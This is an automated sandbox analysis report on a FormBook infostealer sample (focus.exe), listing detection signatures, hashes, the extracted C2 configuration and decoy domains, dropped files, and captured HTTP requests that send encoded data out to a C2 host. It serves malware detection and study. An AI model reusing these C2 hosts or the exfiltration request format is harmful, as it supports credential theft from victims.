Analysis Report focus.com

Overview

General Information

Sample Name: focus.com (renamed file extension from com to exe)
Analysis ID: 412792
MD5: 5e5cc661beb832b718df6b68d16c0165
SHA1: af146998a35d9a76b9969b85811d19b2a5cd21a9
SHA256: bf07af9d0e95551d5599a2c1145adc2fb24595e8451c1340b91969f8577cd212
Tags: com
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has a writeable .text section
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://www.forenvid.com/vns/ Avira URL Cloud: Label: malware
Source: http://www.forenvid.com Avira URL Cloud: Label: malware
Source: http://www.forenvid.com/vns/www.thebosscollectionn.com Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.hollandhousedesigns.design/vns/"], "decoy": ["sparkspressworld.com", "everydayresidency.com", "thebosscollectionn.com", "milkweedmagic.com", "worklesshours.com", "romeosfurnituremadera.com", "unclepetesproduce.com", "athleticamackay.com", "9nhl.com", "powellassetmanagement.com", "jxlamp.com", "onpointpetproducts.com", "buymysoft.com", "nazertrader.com", "goprj.com", "keeptalkservice.com", "aolei1688.com", "donstackl.com", "almasorchids.com", "pj5bwn.com", "featuredshop2020.com", "connectmheduaction.com", "kcastleint.com", "quintessentialmiss.com", "forenvid.com", "vetementsbd.com", "fabrizioamadori.net", "remaxplatinumva.com", "drivecart.net", "ordertds.com", "huayuanjiajiao.com", "islamiportal.com", "innergardenhealing.space", "wlwmwntor.com", "wiitendo.com", "ceschandigarh.com", "mitchellche.com", "levaporz.com", "eraophthalmica.com", "gnzywyht.com", "bobbinsbroider.com", "pollygen.com", "xn--kbrsotocheckup-5fcc.com", "theunprofessionalpodcast.com", "lendini.site", "digitalpardis.com", "meenaveen.com", "yihuafence.com", "mercadoaria.com", "domennyarendi44.net", "juandiegopalacio.com", "meltdownfitnesstulsa.com", "xn--laclnicadelvnculo-gvbi.com", "paripartners378.com", "valadecia.com", "womenring.com", "ocarlosresolve.com", "vedicherbsindia.com", "nonnearrapate.com", "viplending.net", "angelbeatsgamingclan.com", "rigmodisc.com", "page-id-78613.com", "yapadaihindi.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll Metadefender: Detection: 20% Perma Link
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Metadefender: Detection: 26% Perma Link
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe ReversingLabs: Detection: 68%
Multi AV Scanner detection for submitted file
Source: focus.exe Virustotal: Detection: 68% Perma Link
Source: focus.exe Metadefender: Detection: 26% Perma Link
Source: focus.exe ReversingLabs: Detection: 89%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.player-toolkit.exe.10000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_00014C60 BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider, 29_2_00014C60
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E584EA0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError, 32_2_6E584EA0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E585B30 CryptAcquireContextW,GetLastError,CryptGetUserKey,CryptReleaseContext, 32_2_6E585B30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E586950 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext, 32_2_6E586950

Compliance:

barindex
Uses 32bit PE files
Source: focus.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt Jump to behavior
Source: focus.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: C:\workdir\build\Release_TS\IDMBrBtn\icu4c-57_1-src\obj\win3.pdb source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, wscript.exe, 00000018.00000002.463956730.00000000049EC000.00000004.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr
Source: Binary string: D:\winx64-packages\Release\Release\PotPlayer\obj\Vi.pdb source: player-toolkit.exe, 00000002.00000002.359142610.000000006E4D6000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.464579995.000000006E616000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp, libdisplay4-1.dll.0.dr
Source: Binary string: wntdll.pdbUGP source: player-toolkit.exe, 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: player-toolkit.exe, wscript.exe
Source: Binary string: wscript.pdb source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E56CD40 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,FindFirstFileW,FindNextFileW,WideCharToMultiByte, 32_2_6E56CD40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E5490FC FindFirstFileExW, 32_2_6E5490FC

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 4x nop then pop esi 2_2_000272CF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop esi 24_2_003E72CF

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.hollandhousedesigns.design/vns/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd HTTP/1.1Host: www.ordertds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RACKSPACEUS RACKSPACEUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).
Source: global traffic HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 188725Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 48 55 57 6f 74 6b 64 78 4c 38 4d 73 73 56 4c 75 37 68 53 7a 5f 53 78 70 54 6f 45 6e 6c 4d 33 71 61 73 6e 30 6a 49 58 38 59 6b 41 68 36 6c 42 77 65 31 58 67 33 77 78 31 54 39 5f 7e 37 50 51 78 70 79 6f 78 59 65 43 44 71 33 53 7a 6f 32 76 33 64 39 53 54 53 77 45 4b 73 5a 47 77 79 52 5f 37 37 44 78 4c 30 66 73 59 34 61 34 77 38 35 46 64 38 75 6b 45 42 33 75 65 43 75 55 32 36 51 4f 68 4f 6a 78 54 46 68 5f 69 4f 4a 76 62 42 4d 34 69 59 48 73 67 68 55 76 30 73 74 77 35 2d 6f 38 76 4d 31 39 6b 37 57 63 6a 70 42 35 34 71 75 71 43 38 58 75 78 68 77 6d 75 4c 4e 69 78 2d 73 6a 38 30 54 6e 4b 77 61 53 44 31 71 66 77 73 28 57 32 2d 74 39 7a 77 33 6a 4d 75 4e 59 36 37 36 59 52 67 39 55 34 71 78 69 4e 54 47 61 4c 43 45 50 4b 67 71 30 61 51 76 4c 4b 41 56 49 77 75 6c 48 72 54 49 4d 75 61 59 49 69 4a 47 77 59 38 46 37 4f 49 38 32 72 4f 61 38 77 6a 62 4d 76 39 4f 31 33 43 36 7a 30 4d 43 41 39 48 42 42 38 36 4f 49 59 4a 48 47 6c 51 38 72 70 42 51 79 50 5f 74 6f 38 70 58 44 37 75 38 62 51 68 63 74 4f 36 45 4f 47 32 41 6c 76 7a 36 35 4a 70 71 44 67 45 67 32 54 54 61 74 57 36 71 49 35 4d 66 61 73 38 69 78 34 65 55 61 66 38 76 6f 53 47 6e 5a 72 37 56 56 4f 73 69 65 62 2d 45 48 47 47 50 30 78 41 47 35 75 46 46 7a 41 76 72 58 76 70 65 77 7a 7a 54 44 64 43 77 34 63 55 63 7a 67 31 31 6d 59 64 56 58 36 56 74 53 30 36 6d 55 37 75 75 6d 50 70 37 30 67 43 51 62 55 6e 57 47 4a 73 31 41 72 36 42 4f 70 6b 78 65 79 4b 50 68 5a 35 52 50 6d 6b 32 4d 72 6d 6b 43 76 2d 43 75 77 6e 51 35 6e 51 69 72 66 48 52 52 6f 33 64 4a 32 7a 41 4e 53 52 63 65 63 4f 5a 57 46 64 55 46 54 44 43 78 7a 6f 68 72 74 2d 39 74 46 33 72 76 7e 77 30 47 67 72 73 76 4c 44 4b 39 64 4f 4d 4f 58 78 43 34 6c 50 6b 55 48 56 33 43 49 6c 46 35 4e 49 39 68 47 34 46 51 4b 67 28 57 52 4c 72 71 31 4e 31 70 38 51 76 54 73 38 31 6c 4e 5a 4c 30 73 44 54 63 73 66 6c 55 28 70 59 4f 28 6d 78 42 70 76 46 7a 42 65 73 32 6b 52 65 5f 34 4c 4c 4a 58 51 64 62 69 6b 56 4f 48 49 34 37 55 44 47 51 55 31 32 35 49 63 28 74 77 5f 78 53 37 67 6f 46 49 66 55 6f 75 30 35 73 79 53 74 35 45 6a 48 6f 38 36 68 2d 61 42 61 50 35 77 6c 4d 77 6c 34 31 35 46 75 4d 75 32 49 6b 43 2d 59 57 41 70 52 31 31 49 35 4a 33 52 62 75 4b 64 53 45 33 50 59 41 37 36 39 74 31 61 45 4d 58 61 57 46 56 77 76 51 42 42 44 66 6e 30 55 41 28 6b 65 38 36 6b 4d 70 6f 6f 6d 38 76 67 6c 43 73 61 41 55 4f 50 5a 61 6d 70 48 45 62 79 74 49 6f 6b 68 49 42 46 73 4c 78 76 50 6d 57 5a 74 48 42 78 4e 79 53 34 68 41 49 57 7a 57 4d 70 37 53 59 7a 6f 48 6a 79 72 7a 61 37 42 50 62 77 63 2d 4a 39 76 64 4f 39 61 79 32 2d 77 35 53 6a 4d 36 69 35 61 4f 58 6d 30 54 43 77 6
Source: C:\Windows\explorer.exe Code function: 19_2_065C0782 getaddrinfo,setsockopt,recv, 19_2_065C0782
Source: global traffic HTTP traffic detected: GET /vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd HTTP/1.1Host: www.ordertds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.ordertds.com
Source: unknown HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: changelog.txt.0.dr String found in binary or memory: http://groups.google.com/group/lyricwiki-api/browse_thread/thread/733ccd919d654040
Source: changelog.txt.0.dr String found in binary or memory: http://lyrics.wikia.com
Source: changelog.txt.0.dr String found in binary or memory: http://lyrics.wikia.com.
Source: focus.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: focus.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: changelog.txt.0.dr String found in binary or memory: http://skwire.dcmembers.com/fp/?page=trout
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoE
Source: OptimFROG.dll.0.dr String found in binary or memory: http://www.LosslessAudio.org2
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.athleticamackay.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.athleticamackay.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.athleticamackay.comReferer:
Source: changelog.txt.0.dr String found in binary or memory: http://www.autohotkey.com/forum/topic69642.html
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.buymysoft.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.buymysoft.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.buymysoft.com/vns/www.wlwmwntor.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.buymysoft.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.domennyarendi44.net
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.domennyarendi44.net/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.domennyarendi44.net/vns/www.milkweedmagic.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.domennyarendi44.netReferer:
Source: changelog.txt.0.dr String found in binary or memory: http://www.donationcoder.com/Software/Mouser/Updater/downloads/DcUpdaterSetup.exe
Source: changelog.txt.0.dr String found in binary or memory: http://www.donationcoder.com/Software/Mouser/Updater/downloads/dcuhelper.zip
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.everydayresidency.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.everydayresidency.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.everydayresidency.com/vns/www.sparkspressworld.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.everydayresidency.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.forenvid.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.forenvid.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.forenvid.com/vns/www.thebosscollectionn.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.forenvid.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.hollandhousedesigns.design
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.hollandhousedesigns.design/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.hollandhousedesigns.design/vns/M
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.hollandhousedesigns.designReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.innergardenhealing.space
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.innergardenhealing.space/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.innergardenhealing.space/vns/www.forenvid.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.innergardenhealing.spaceReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: changelog.txt.0.dr String found in binary or memory: http://www.last.fm/api/submissions#subs
Source: changelog.txt.0.dr String found in binary or memory: http://www.lyricwiki.org
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.milkweedmagic.com
